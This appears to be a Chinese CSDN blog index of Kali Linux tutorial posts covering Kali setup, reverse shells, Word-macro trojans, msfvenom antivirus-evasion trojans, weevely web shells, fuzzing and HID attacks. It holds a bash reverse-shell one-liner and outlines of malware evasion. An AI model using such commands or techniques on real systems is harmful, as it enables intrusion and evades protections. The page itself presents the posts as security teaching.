![](https://img-blog.csdnimg.cn/20201014180756930.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
kali笔记
文章平均质量分 84
使用kali的各种笔记
XG小刚
这个作者很懒,什么都没留下…
展开
-
工欲善其事,必先配置好kali
kalikali是个好东西啊,玩起来满满的报错。 有人说:kali玩得好,牢饭吃得饱。可我没接入外网,你拿我咋地大学这几年接触最多的是kali,也忘记听谁忽悠了,一开始就玩起了kali。毕竟我没什么基础,玩起来有点吃力,但经过长时间的摸爬滚打,终于会开关机了。kali说白了就是个普普通通的Linux操作系统,只不过是他们集成了大量的工具集在里面,不需要自己太复杂的配置,只要学会玩就行了。玩起来...原创 2019-05-05 09:26:48 · 2845 阅读 · 4 评论 -
反弹shell--bash一句话解析
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途反弹shell解析bash反弹shell解析拆分语句了解一下交互式连接设备文件描述符合并输入输出大合并bash反弹shell解析最基础的反弹shell语句,这么久只会用,但不知道其中的奇妙之处真是妙蛙种子被踢出了米奇妙妙屋。。。bash -i >& /dev/tcp/192.168.1.1/8888 0>&1拆分语句了解一下交互式bash -i是打开一个.原创 2021-01-10 18:33:17 · 3064 阅读 · 3 评论 -
一个Word无形中控制你的电脑
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Word宏添加木马病毒前言创建木马word1.生成木马代码2.创建word文件3.打开msf监听注意==本文只是普及防木马和信息防御教学,切勿用于其他用途。==前言我们知道windows和inux的软件等等很容易被植入木马或者病毒。但你们知道word和excel文件依旧可以植入木马吗?office有个功能叫做宏,通常情况下是关闭状态,当有宏操作时候会提示你已经禁止了宏,问你咋整这情况普.原创 2020-09-21 13:34:37 · 1077 阅读 · 0 评论 -
反黑客-script进行操作录像
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途反黑客-命令操作录像操作录像script录像scriptreplay播放录像自动记录黑客操作录像现在监控黑客有很多方法,比如蜜罐但是当黑客绕过了蜜罐,进入了我们真实主机环境,进行了一系列的操作,隐藏进程等等我们还是要留一手的,留一手用来监控黑客都干了啥,好来还原进程,找出隐藏的木马。在linux系统上有两个命令,script和scriptreplay能够对命令运行过程进行录像操作用法非.原创 2020-09-03 08:34:05 · 330 阅读 · 0 评论 -
Wfuzz模糊测试工具-能模糊的地方都能模糊
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Wfuzz模糊测试-URL爆破扫描WFUZZwfuzz参数wfuzz使用方法1、最基本模糊测试路径,文件名,参数值2.过滤显示3.POST请求测试4.指定Cookie5.递归扫描目录总结WFUZZwfuzz是用python开发的针对web的模糊测试工具,该工具实现功能相当于burp的爆破模块,可以自定义指定参数进行爆破测试。该工具在kali中已经安装并直接使用也可以用pip安装wfuzz.原创 2020-08-04 17:39:36 · 2543 阅读 · 0 评论 -
msfvenom制作360,腾讯免杀木马
介绍msfvenom是用来制作msf所支持的木马文件的,在这介绍一下msfvenom的几个使用参数,和如何制作免杀木马。主要过程就是使用msfvenom指定特定编码,编码次数等生成c语言代码,再使用==VC++==生成程序文件。msfvenom参数这里列出几个常用参数,其他参数可使用help查看。-p指定所使用的payload-e指定使用的编码器-b删除无效字符-i指定编码次数-f指定生成的文件类型-l列出可使用的项-o导出为某文件原创 2020-05-19 15:37:27 · 3740 阅读 · 13 评论 -
weevely生成木马并反向shell连接msf
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于它用途weevely实验环境weevely介绍使用流程1,使用weevely生成php木马文件2,将木马文件上传到被攻击web服务器3,使用weevely连接木马文件4,控制参数5,反向shell连接msf总结今天使用一下kali系统下的中国菜刀weevely,生成木马文件、混淆木马文件控制Web服务器,并进一步反弹shell给metasploit做进一步控制。实验环境VM搭建的虚拟测试环境1.p.原创 2020-05-13 11:13:50 · 3662 阅读 · 1 评论 -
kali解决中文乱码
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于它用途文章目录KLAI最新版安装后的配置中文乱码KLAI最新版kali Linux官网发布了Kali Linux 2019.4,此版本和之前相比变动非常大,安装完我都蒙了,系统主题界面、壁纸全都变了。还做了许许多多的更新默认桌面改为XFCE,替换为原有的Gnome。使...原创 2020-04-30 09:29:46 · 2009 阅读 · 0 评论 -
kali之arp-scan
Arp-scan是一款kali自带的一款轻量ARP扫描工具,该工具会自动解析MAC地址,得到对应硬件厂商。对于目标主机:可以指定为IP地址或主机名。也可以指定为一个网段(例如192.168.1.0/24),或者地址范围(例如192.168.1.3-192.168.1.27),或者到 指定给定网络中的所有主机和掩码(例如192.168.1.0:255.255.255.0)常用指令:-f &...原创 2019-05-25 18:54:39 · 5654 阅读 · 0 评论 -
kali之ACE
今天聊聊一款信息搜集工具ACE(Automated Corporate Enumerator)ACE据kali介绍,ACE是一个简单但功能强大的VoIP公司目录枚举工具,它能模仿IP电话的行为,以便下载给定电话可在其屏幕界面上显示的名称和扩展条目。户能够通过其VoIP手机轻松按名称拨号的方式,ACE是从“VoIP Hopper”开始的一种研究理念,用于自动化针对名称的VoIP攻击。它目的是...原创 2019-05-23 16:39:30 · 529 阅读 · 0 评论 -
kali之HID Attack
今天尝试了一下kali nethunter系统的一个特色功能HID Attack,可以说是无敌的存在啊!!HID Attack是一种人机接口设备攻击,就类似与模拟键盘,鼠标,手柄而实现对电脑的操作,而电脑对于这种攻击的预防可以说是啥也不管,只是识别一下设备,就把它当成了键盘或者鼠标等HID设备,所以插上就能用。HID Attack我的理解是预先编程好脚本,他会模拟键盘命令输入电脑,实现对...原创 2019-05-17 13:42:28 · 1774 阅读 · 0 评论